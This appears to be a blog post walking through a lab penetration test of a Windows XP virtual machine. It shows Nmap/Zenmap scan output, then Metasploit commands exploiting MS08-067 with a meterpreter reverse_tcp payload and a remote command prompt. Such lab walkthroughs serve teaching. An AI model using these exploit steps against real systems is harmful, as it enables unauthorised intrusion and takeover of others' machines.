Information Gathering :
Use Zenmap to identification specification data of target.
Result of scanning is :
Initiating SYN Stealth Scan at 03:28
Scanning 2 hosts [1000 ports/host]
Discovered open port 135/tcp on 192.168.56.102
Discovered open port 139/tcp on 192.168.56.102
Discovered open port 445/tcp on 192.168.56.102
Completed SYN Stealth Scan against 192.168.56.102 in 1.33s (1 host left)
Completed SYN Stealth Scan at 03:28, 8.25s elapsed (2000 total ports)
Initiating Service scan at 03:28
Scanning 3 services on 2 hosts
Completed Service scan at 03:28, 6.01s elapsed (3 services on 2 hosts)
Initiating OS detection (try #1) against 2 hosts
Retrying OS detection (try #2) against 192.168.56.100
NSE: Script scanning 2 hosts.
Initiating NSE at 03:29
Completed NSE at 03:29, 0.02s elapsed
Nmap scan report for 192.168.56.100
Host is up (0.000064s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:D4:42:4C (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.06 ms 192.168.56.100
Nmap scan report for 192.168.56.102
Host is up (0.00055s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5F:41:EC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat:
| NetBIOS name: XXX-8ADCB030A79, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:41:ec (Cadmus Computer Systems)
| Names
| XXX-8ADCB030A79<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| XXX-8ADCB030A79<20> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.56.102
In Zenmap result we can look indentification of Target specify.
Important informasion is :
Nmap scan report for 192.168.56.102
OS details: Microsoft Windows XP SP2 or SP3
For next step is
Service Enumeration :
Result of Zenmap is
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
We can look service running on target system.
And next is
Vulnerability Assessment and Identification :
I use Nessus to identification Vulnerability of target
result of nessus is
We can look 2 point of vulnerability has found, and I try to expose it
Exploitation :
I use Metasploit Console to exploit target, open terminal and type : msfconsole
And next step is matched vulnerability Assesment and Identification data from Nessus to use in Metasploit, previous I had found most interest vulnerability is MS08-067
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
and set LHOST and RHOST
LHOST is My IP
RHOST is Target IP
set LHOST 192.168.56.1 < < My IP
set RHOST 192.168.56.102 < < Target IP
and type exploit to start exploitation target
After we on meterpreter mode its mean we has make hole to taget system with payload we used, now we need to enter C:\ on system32 to full takedown target system
use syntax
meterpreter > execute -M -f cmd.exe
This command mean we make system execute command prompth on system (XP) and afte that we enter to system32 target
No comments:
Post a Comment